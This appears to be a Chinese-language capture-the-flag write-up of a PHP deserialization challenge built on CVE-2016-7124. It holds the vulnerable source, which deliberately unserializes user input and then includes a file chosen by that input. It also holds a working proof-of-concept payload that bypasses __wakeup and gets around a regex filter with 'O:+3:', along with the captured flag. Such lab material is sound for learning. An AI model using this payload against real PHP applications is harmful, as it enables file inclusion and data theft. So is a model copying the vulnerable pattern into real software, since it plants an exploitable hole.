源码
CVE-2016-7124漏洞影响版本:PHP5 < 5.6.25,PHP7 < 7.0.10
<?php
class Leo
{
var $file = 'index.php';
public function __construct($file)
{
$this->file = $file;
}
function __destruct()
{
printf("%s\n", __METHOD__);
include_once($this->file);
echo $flag;
}
function __wakeup()
{
printf("%s\n", __METHOD__);
$this->file = 'index.php';
}
}
$cmd = $_REQUEST['Leo'];
if (!isset($cmd)) {
echo "系统检测发现该处漏洞,进行攻击测试\n";
} else {
if (preg_match('/[oc]:\d+:/i', $cmd)) {
echo "服务器检测到恶意反序列化格式数据,启动了查杀程序\n";
} else {
unserialize($cmd);
}
}
?>
|
POC
<?php
class Leo
{
var $file = 'index.php';
public function __construct($file)
{
$this->file = $file;
}
}
echo urlencode('O:+3:"Leo":2:{s:4:"file";s:8:"flag.php";}');
|
O%3A%2B3%3A%22Leo%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
|
传入payload,得到
Leo::__destruct
Sonder{571a973-658c89b3ebb7d-47bc0603c81b}
|
- 当序列化字符串中,对象的属性个数与实际的属性个数不相等时,反序列化不会触发
wakeup
O:+3:代替O:3: 绕过[oc]:\d:的正则检测,这样:与: 之间就不是纯数字了- 用
urlencode() 编码防止+ 在get 请求中被浏览器当作空格解析
参考:https://www.yuque.com/shiyizhesonder/sonder39/yp9tmv9a0op0b9tp
